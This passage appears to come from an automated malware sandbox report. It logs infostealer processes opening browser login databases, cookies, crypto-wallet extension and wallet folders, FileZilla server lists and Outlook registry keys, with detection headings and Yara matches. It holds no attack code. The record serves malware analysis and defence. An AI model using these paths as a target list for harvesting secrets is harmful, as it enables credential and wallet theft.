Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\System32\dialer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\System32\dialer.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Windows\System32\dialer.exe	Directory queried: C:\Users\Default\Documents

Source: Yara match	File source: 31.2.nsa984B.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.nsa984B.tmp.exe.8b0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp, type: MEMORY
